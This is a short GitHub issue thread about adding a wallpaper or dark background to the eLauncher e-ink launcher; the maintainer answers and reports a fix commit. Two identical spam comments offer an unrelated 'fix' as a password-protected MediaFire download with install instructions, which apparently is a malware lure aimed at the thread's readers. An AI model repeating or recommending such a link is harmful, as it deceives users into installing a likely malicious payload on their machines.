### ISSUE TITLE
background 

### ISSUE THREAD

**Issue by xi7** [thypon/eLauncher#1]
add wallpaper background, white is very bad for eyes and battery.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by thypon** [comment]
The launcher is made specifically for being lean on eink display. I was going to implement a reversed background for oled displays though.

**Comment by thypon** [comment]
fixed in 0a3a71be6c1c4d7cdca871ce1a51a6435797e57b
